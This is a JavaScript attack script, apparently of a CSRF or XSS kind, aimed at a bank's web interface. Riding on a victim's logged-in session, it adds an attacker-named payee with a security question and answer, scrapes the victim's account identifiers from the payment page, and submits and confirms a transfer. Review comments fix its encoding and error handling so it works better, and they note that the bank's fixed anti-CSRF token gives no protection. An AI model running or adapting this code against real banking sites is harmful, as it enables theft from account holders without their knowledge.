//Define the variables for who we want to give money to.
// These are attacker-chosen constants; they are read as globals by addRecipient(),
// payrecipient() and parseResponseSendrecipient() further down.
var my_first_name = 'Steve'; //first name
var my_last_name = 'Meacham'; //last name
var my_email = 'pastebinjunk@stevemeacham.me'; //email address
var security_question = 'my company'; //security question for money transfer
// NOTE(review): this value contains spaces and an '&', yet the request builders below paste it raw into
// an application/x-www-form-urlencoded body, where '&' begins a new field. Unless the value is
// form-encoded (encodeURIComponent) first, the server will see the answer cut off at the '&'.
var security_answer = 'Meacham & Meacham'; //response to security question (the old note "no spaces allowed" contradicted this value)
var today_day = '31'; //today's day   -- hard-coded; the payment date must still be valid on the day the script runs
var today_month = '7'; //today's month
var today_year = '2013'; //today's year
var my_amount = '20'; //amount you want to transfer. Must be at least $10
var from_account; // 'from' account value; written by parseResponseSendrecipient() from the payment-screen HTML
var to_account; // 'to' account value; written by parseResponseSendrecipient() the same way
var current_server_response; //not used
//generic HTTPObject - can be extended to include IE support
// Returns a fresh XMLHttpRequest, `false` if the constructor exists but throws,
// and `undefined` when the environment has no XMLHttpRequest at all.
// Callers must check the result before calling open() on it.
function getHTTPObject() {
    // Only the standards-based constructor is attempted; there is no ActiveXObject fallback.
    if (typeof XMLHttpRequest === 'undefined') {
        return undefined;
    }
    try {
        return new XMLHttpRequest();
    } catch (e) {
        // Constructor present but unusable: report failure with `false`.
        return false;
    }
}
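// Run both stages as soon as the script is evaluated; function declarations are hoisted,
// so these calls may legally precede the definitions below.
// Note the lower-case r in payrecipient(): that is how the function is declared. Calling a
// non-existent payRecipient() here would throw a ReferenceError *after* the recipient had
// already been added, leaving the victim's account modified but no payment made.
addRecipient(); //adds malicious recipient
payrecipient(); //pays malicious recipient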
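//function to add recipient
// Replays the bank's add-recipient flow as four synchronous POSTs that ride on the victim's
// ambient session cookie. Reads the my_* / security_* globals; returns nothing.
// NOTE(review): SVTKN=x1z77v is a fixed literal. If that parameter is meant to be the bank's
// anti-CSRF token, a value that is identical for every user and session gives no protection; a
// real defence needs a per-session, unpredictable token (plus SameSite cookies), which a script
// like this could not embed up front. BHT1=0 is replayed as-is; its meaning is not known from this file.
function addRecipient () {
    var session_params = 'SVTKN=x1z77v&BHT1=0';
    // Form-encode every attacker-supplied value. The original concatenated them raw, so the '&' in
    // security_answer would have started a new form field and the spaces went out unencoded.
    // encodeURIComponent writes the space in the display name as %20, which decodes to "First Last".
    var recipient_params = '&NAME=' + encodeURIComponent(my_first_name + ' ' + my_last_name)
        + '&EMAIL=' + encodeURIComponent(my_email)
        + '&QUESTION=' + encodeURIComponent(security_question)
        + '&ANSWER=' + encodeURIComponent(security_answer)
        + '&CONFIRM_ANSWER=' + encodeURIComponent(security_answer);
    //First go to payments page
    sendBankRequest('banksecure/funcs/mainBalance', 'REQUESTYPE=CheckBalance&LANGUAGE=EN&' + session_params);
    //Now go to add recipient page
    sendBankRequest('banksecure/funcs/payFnds', 'REQUESTYPE=addRecipient&LANGUAGE=EN&' + session_params);
    //Enter in the info for the recipient that you want to add and give the security question and answer
    sendBankRequest('banksecure/funcs/payFnds', 'REQUESTYPE=addNewRecipient&LANGUAGE=EN&' + session_params + recipient_params);
    //Verify the details of the request
    sendBankRequest('banksecure/funcs/payFnds', 'REQUESTYPE=verifyRequest&LANGUAGE=EN&' + session_params + recipient_params + '&VERIFY_RSPNS=OK');
    //recipient is added!
}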
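//function to pay the recipient that addRecipient() created
// 1. loads the payment screen, 2. scrapes the victim's 'from' account id and the new recipient's
//    'to' account id out of its HTML (parseResponseSendrecipient), 3. submits and confirms a one-off
//    payment of my_amount dated today_*. Returns nothing.
// The scrape in step 2 only works when this script executes same-origin with the bank (for example
// via an XSS): a cross-origin POST still carries the session cookie but its response cannot be read.
function payrecipient() {
    var session_params = 'SVTKN=x1z77v&BHT1=0';
    //Send a request to do an online payment
    var resp = sendBankRequest('banksecure/funcs/onlinePayments', 'REQUESTYPE=StartPaymentScreen&LANGUAGE=EN&' + session_params);
    //Parse out the response to find the unique account values for 'to' and 'from'
    parseResponseSendrecipient(resp);
    // Stop here instead of POSTing "FROM_ACCT=undefined" / empty ids when the scrape found nothing.
    if (!from_account || !to_account) {
        return;
    }
    // Form-encode the values as they go into the urlencoded body (the original pasted them raw).
    // Parameter spellings FROM_ACCT / TO_ACCNT are kept exactly as the server is expected to read them.
    var payment_params = '&AMOUNT=' + encodeURIComponent(my_amount)
        + '&FROM_ACCT=' + encodeURIComponent(from_account)
        + '&TO_ACCNT=' + encodeURIComponent(to_account)
        + '&DAY=' + encodeURIComponent(today_day)
        + '&MONTH=' + encodeURIComponent(today_month)
        + '&YEAR=' + encodeURIComponent(today_year)
        + '&FREQUENCY=once';
    //make payment request
    sendBankRequest('banksecure/funcs/onlinePayments', 'REQUESTYPE=MakePayment&LANGUAGE=EN&' + session_params + payment_params);
    //confirm payment details (the recipient's security question/answer are re-submitted here)
    sendBankRequest('banksecure/funcs/onlinePayments', 'REQUESTYPE=ConfirmPayment&LANGUAGE=EN&' + session_params + payment_params
        + '&QUESTION=' + encodeURIComponent(security_question)
        + '&ANSWER=' + encodeURIComponent(security_answer)
        + '&CONFIRM_ANSWER=' + encodeURIComponent(security_answer)
        + '&VERIFY_RSPNS=OK');
    //Payment sent!
}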
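//Function to send request to bank
// POSTs my_post_params (already application/x-www-form-urlencoded) to my_page and returns the
// response body as text. The request is synchronous so the multi-step flows can be written linearly.
// my_page is a relative path ('banksecure/funcs/...'), so it resolves against the page the script
// runs in; the flows that read the response therefore only work same-origin with the bank.
// Throws an Error (rather than a bare TypeError) when no XMLHttpRequest implementation is available.
function sendBankRequest(my_page, my_post_params) {
    //the object that makes it all possible!
    var xmlhttp = getHTTPObject();
    // getHTTPObject() hands back undefined or false when it cannot build a request object;
    // the original dereferenced that blindly.
    if (!xmlhttp) {
        throw new Error('sendBankRequest: XMLHttpRequest is not available');
    }
    // Third argument false = synchronous: open()/send() block until the response is in.
    // (Synchronous XHR is deprecated in modern browsers; kept because the callers rely on the return value.)
    xmlhttp.open("POST", my_page, false);
    // NOTE(review): these headers do not actually disguise the request. Accept-Charset is a forbidden
    // request header for XHR and most browsers also refuse a script-supplied User-Agent; the browser
    // silently sends its own values (some older engines threw here instead). They are kept unchanged.
    xmlhttp.setRequestHeader('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12');
    xmlhttp.setRequestHeader('Accept-Language','en-us,en;q=0.5');
    xmlhttp.setRequestHeader('Accept-Charset','ISO-8859-1,utf-8;q=0.7,*;q=0.7');
    // The body is a form post; this is also what lets the request go out without a CORS preflight.
    xmlhttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    //send the request and return the response
    xmlhttp.send(my_post_params);
    return xmlhttp.responseText;
}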
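//Search through specific page for to and from accounts
//Using this same technique we could pick out an anti-CSRF token
//Basically this is just parsing HTML
// Scrapes two values out of the payment-screen HTML into the from_account / to_account globals.
// The offsets (+30, -2, the 40-character look-back) are fitted to the exact markup of the target
// page and cannot be derived from this file; treat them as fixtures.
// Returns true when both markers were found and the globals were written, false otherwise. On a miss
// the globals are left untouched (the original sliced arbitrary text out of the page when indexOf
// returned -1).
function parseResponseSendrecipient (my_response) {
    if (typeof my_response !== 'string') {
        return false;
    }
    //look through page for the account number they are using for the victim
    var from_index = my_response.indexOf('from_account=\"client_val\"');
    var from_end = my_response.indexOf('>', from_index);
    //now we look for the to account: the recipient's display name sits just after its option value
    var to_index = my_response.indexOf(my_first_name + ' ' + my_last_name);
    if (from_index === -1 || from_end === -1 || to_index === -1) {
        return false;
    }
    //estimate that the value can't be more than 40 characters previous to this
    // (indexOf clamps a negative start to 0; Math.max makes that explicit)
    var to_option_index = my_response.indexOf('\"', Math.max(to_index - 40, 0));
    if (to_option_index === -1 || to_option_index >= to_index) {
        return false;
    }
    from_account = my_response.substring(from_index + 30, from_end - 2);
    to_account = my_response.substring(to_option_index + 1, to_index - 2);
    return true;
}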